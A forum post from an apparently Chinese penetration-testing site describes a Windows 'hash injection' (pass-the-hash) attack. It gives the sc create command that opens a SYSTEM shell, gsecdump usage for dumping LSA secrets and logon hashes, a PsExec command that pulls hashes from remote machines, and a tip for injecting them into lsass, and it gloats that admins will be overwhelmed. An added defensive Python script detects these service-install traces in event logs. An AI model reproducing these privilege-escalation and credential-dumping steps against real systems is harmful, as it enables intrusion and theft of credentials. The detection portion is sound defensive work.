中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Hash injection attack

Author: admin    Time: 2012-11-6 21:09

To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to load the hashes just grabbed with gsecdump into the local lsass process, which gives you the hash injection attack. The foreigners really are good at this; admins are going to have their hands full now. The LM/NT hashes picked up during ARP spoofing, and the ones obtained with gethash, don't need the password cracked at all; it is purely a matter of using the tools. As the original article puts it well, no matter whether the password is set to 4 characters or 127, once you have the hash it is 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I had a look at the original source; it seems to be from /2007/03/16/. Depressing; what a gap.
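Everything the post walks through leaves the same trace on the host: a Windows service gets installed whose binary is an interactive shell (the `sc create ... cmd.exe /K start` step), or a copied executable is run as SYSTEM on a remote machine through PsExec, which itself installs a helper service on the target. As an added example that is not part of this post or of the truesec article it quotes, the following Python checker scans a constructed, simplified CSV export of Windows System-log "service installed" records (Event ID 7045) for those two patterns. The CSV layout, the sample rows, the `executable_name`/`find_suspicious_service_installs` helper names and the use of `PSEXESVC` as the name of the service PsExec installs on the target are assumptions made for this example.

```python
import csv
import io
from dataclasses import dataclass

# Constructed sample: a simplified CSV export of Windows System-log
# "service installed" records (Event ID 7045) plus one unrelated 7036 row.
# Real exports carry more columns and a different layout; this shape is an
# assumption for the example. The first two rows mirror the post: a service
# whose binary is cmd.exe, and the helper service PsExec installs remotely.
SAMPLE_EXPORT = """\
event_id,timestamp,service_name,image_path,start_type,account
7045,2012-11-06 21:05:12,shellcmdline,C:\\WINDOWS\\system32\\cmd.exe /K start,demand start,LocalSystem
7045,2012-11-06 21:06:40,PSEXESVC,%SystemRoot%\\PSEXESVC.exe,demand start,LocalSystem
7045,2012-11-06 21:07:03,Spooler,C:\\WINDOWS\\system32\\spoolsv.exe,auto start,LocalSystem
7045,2012-11-06 21:08:55,updater,C:\\Program Files\\Vendor\\updater.exe,auto start,LocalSystem
7036,2012-11-06 21:09:10,Spooler,,,
"""

# Binaries that make no sense as a long-running service: an interactive shell
# registered as a service is the pattern shown in the post.
SHELL_BINARIES = {"cmd.exe", "command.com", "powershell.exe"}

# Assumption: PSEXESVC is the service name PsExec creates on the remote host.
REMOTE_EXEC_SERVICES = {"psexesvc"}


@dataclass
class Finding:
    timestamp: str
    service_name: str
    image_path: str
    reason: str


def executable_name(image_path: str) -> str:
    """Return the lower-cased file name of the program in a service ImagePath.

    Handles quoted paths ("C:\\Program Files\\x\\a.exe" /arg) as well as
    unquoted ones (C:\\WINDOWS\\system32\\cmd.exe /K start).
    """
    path = image_path.strip()
    if path.startswith('"'):
        end = path.find('"', 1)
        path = path[1:end] if end > 0 else path[1:]
    else:
        path = path.split(" ", 1)[0]
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_suspicious_service_installs(export_text: str) -> list[Finding]:
    """Scan the export and return one Finding per suspicious 7045 record."""
    findings: list[Finding] = []
    for row in csv.DictReader(io.StringIO(export_text)):
        if row["event_id"] != "7045":
            continue  # only service-installation records matter here
        exe = executable_name(row["image_path"])
        name = row["service_name"].lower()
        if exe in SHELL_BINARIES:
            reason = "service binary is an interactive shell"
        elif name in REMOTE_EXEC_SERVICES:
            reason = "remote-execution helper service installed"
        else:
            continue
        findings.append(Finding(row["timestamp"], row["service_name"],
                                row["image_path"], reason))
    return findings


if __name__ == "__main__":
    for f in find_suspicious_service_installs(SAMPLE_EXPORT):
        print(f"{f.timestamp}  {f.service_name:<14} {f.reason}: {f.image_path}")
```

Note that in the transcript above `sc start` fails with error 1053 because cmd.exe never reports back to the Service Control Manager, yet the shell has already been launched as SYSTEM, and the service is deleted right afterwards. The service-installation record is written when the service is created, so a check keyed on that event does not depend on the start succeeding or on the service still existing when someone looks.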

Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2